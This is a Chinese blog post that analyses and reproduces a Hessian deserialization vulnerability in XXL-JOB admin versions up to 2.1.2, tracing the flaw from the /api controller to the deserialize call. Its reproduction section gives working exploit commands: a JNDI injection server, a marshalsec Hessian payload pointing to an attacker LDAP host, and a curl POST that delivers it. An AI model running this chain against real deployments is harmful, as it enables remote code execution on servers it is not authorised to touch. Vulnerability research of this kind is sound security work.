xxl-job反序列化漏洞分析复现

最新推荐文章于 2024-08-19 16:57:43 发布
最新推荐文章于 2024-08-19 16:57:43 发布
阅读量4.2k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44112065/article/details/127436977
版权

01 影响范围

  • Xxl-Job<=2.1.2,需要利用Hessian触发。

02 环境搭建

下载地址:https://github.com/xuxueli/xxl-job/releases

修改配置文件

xxl-job-2.0.1/xxl-job-admin/src/main/resources/application.properties

修改数据库信息,以及端口与项目入口目录,默认目录为/xxl-job-admin

修改执行器中的配置文件,改为与admin中相对应的地址端口等

/xxl-job-2.0.1/xxl-job-executor-samples/xxl-job-executor-sample-springboot/src/main/resources/application.properties

新建log文件,并将绝对路径写入到logback.xml中

然后启动项目:

两个项目都得启动

然后访问:http://localhost:8086/xxl-job-admin

03 漏洞分析

搜索反序列化的关键字:deserialize,搜索的范围包含项目文件和项目依赖的库

找到位置,com/xxl/rpc/remoting/net/impl/jetty/server/JettyServerHandler.java#parseRequest中,将请求直接传入了deserialize反序列化方法中

com/xxl/rpc/remoting/net/impl/jetty/server/JettyServerHandler.java#handle中传入了request,并且将request传入刚才会反序列化的方法中

com/xxl/job/admin/core/schedule/XxlJobDynamicScheduler.java#invokeAdminService调用了handle方法,并且也是直接将request进行传入

com/xxl/job/admin/controller/JobApiController.java#api为入口点,调用了刚才的方法,并且为controller可以直接访问,对应的路由为:/api

然后运行环境调试,发现可行,能够将request的数据进入反序列化的函数中,对应的请求为如下所示,调试发现必须为post请求,并且有请求体

调试发现是Hessian的反序列化

通过阅读官网http://hessian.caucho.com/

Hessian 二进制 Web 服务协议使得 Web 服务可用,而不需要大型框架,也不需要学习另一堆协议。因为它是一个二进制协议,所以非常适合于发送二进制数据,而不需要通过附件扩展协议。

然后可以直接使Hessian的Spring链进行漏洞复现即可。

04 漏洞复现

本地搭建好环境:

启动JNDI服务

java8 -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 172.20.10.2 -C "open -na Calculator"

生成payload

java8 -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor ldap://172.20.10.2:1389/dzkfwd > test.ser

发送反序列化数据

curl -XPOST -H "Content-Type: x-application/hessian" --data-binary @test.ser http://localhost:8086/xxl-job-admin/api

参考文档:

  • https://xz.aliyun.com/t/8456

  • http://hessian.caucho.com

大槐TuT
关注
专栏目录
XXL-JOB 任务调度中心 后台任意命令执行漏洞
LiBai'S BLOG
10-17 3万+
在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6393
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
xxl-job反序列化漏洞记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
04-09 896
某次“春耕”期间,某业务系统发现xxl-job反序列化漏洞,通过该漏洞不仅爆破了页面账号密码,还获取了内网主机及数据库权限,“家”被偷了。XXL-JOB是一个轻量级分布式任务调度平台。支持通过web页面对任务进行操作,基于Java-spring boot框架开发,利用Maven依赖编译好,开箱即用。XXL-JOB任务调度中心后台存在命令执行漏洞,经过身份验证的(比如存在弱密码)攻击者可通过该漏洞接管服务器,造成严重信息泄露。
XXL-JOB漏洞分析与利用
最新发布
m0_63828240的博客
08-19 1834
在当今的数字化时代,任务调度平台对于企业级应用来说至关重要。它们负责自动化和协调各种时间敏感或周期性的任务,确保业务流程的顺畅运行。XXL-JOB作为一款流行的分布式任务调度平台,因其强大的功能和易用性,被广泛部署在各种规模的系统中。然而,随着其应用的普及,安全研究人员开始关注这些系统可能存在的潜在风险,一个漏洞的发现可能会导致数据泄露、服务中断甚至整个系统被控制。对于渗透测试人员来说,学习XXL-JOB漏洞原理,能够在一定程度上提升渗透能力。
漏洞复现-XXL-JOB accessToken 存在身份认证绕过漏洞
玄道的网安博客
08-13 726
官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值。默认情况下是非空的,也就是xxl.job.accessToken=default_token。动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 127
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
XXL-JOB默认accessToken身份绕过--远程代码执行漏洞复现
Tender*的博客
11-14 2873
漏洞是由于XXL-JOB 在默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值,如果用户没有修改该默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,导致远程代码执行。链接:https://pan.baidu.com/s/12AkZ6JdpOm36bHrq1EEVPQ。XXL-JOB是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。也可以尝试去搭建环境复现。三.网络空间测绘查询。
xxl-job反序列化漏洞
09-12
关于xxl-job反序列化漏洞,这是一个比较严重的安全问题。该漏洞存在于xxl-job的任务调度中,攻击者可以通过构造恶意序列化数据来执行任意代码,从而导致系统被攻击或者遭受数据泄露。 为了解决这个问题,你可以采取...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
weblogic--反序列化漏洞测试Test
10-19
3. **CVE漏洞编号**:WebLogic反序列化漏洞往往与特定的CVE(Common Vulnerabilities and Exposures)编号相关,比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本,了解具体受影响的版本有助...
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
【MySQL JDBC 反序列化漏洞分析】 MySQL JDBC 反序列化漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
XXL-JOB executor 未授权访问漏洞复现
2301_76467680的博客
06-26 376
ip+端口 //8080管理端 9999客户端。向客户端发送如下数据包。//host为IP地址。
XXL-JOB executor 未授权访问漏洞
qq_59201520的博客
03-28 8651
XXL-JOB executor 未授权访问漏洞漏洞复现和一些理解思考以及复现过程中的问题和解决
xxl-job ssrf漏洞复现
feigerger的博客
01-29 1039
XXL-JOB是基于java语言的分布式任务调度平台,该漏洞来自/trigger,直接向addressList指定的地址发送请求,不判断addressList参数是否为有效的执行器地址。它可以利用SSRF漏洞,攻击者获取XXL-JOB-ACCESS-TOKEN并调用任意执行器。
漏洞复现--XXL-JOB默认accessToken身份绕过漏洞
qq_53003652的博客
11-03 1395
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负。
xxl-job远程命令执行漏洞复现
热门推荐
Bird&Bird
12-15 1万+
目录1、漏洞描述2、靶场搭建3、漏洞复现(反弹shell) 1、漏洞描述 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 2、靶场搭建 靶场使用vulhub 进入vulhub/xxl-job/unacc目录下,执行docker-
XXL-JOB executor 未授权访问漏洞_xxl-job漏洞(1),2024年最新熬夜肝完这份Framework笔记
2401_84185224的博客
04-10 947
glueType”:“BEAN”, //任务模式,可选值参考com.xx1.job.core.glue.alueTypeEnum。“executorTimeout”😮, //任务超时时间,单位秒,大于零时生效。“executorB1ockstrategy”:“cOVER_EARLY”, //任务阻塞策略,可选值参考。“gluesource”:“xxx”, //GLUE脚本代码。“jobId”:1, //任务ID。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值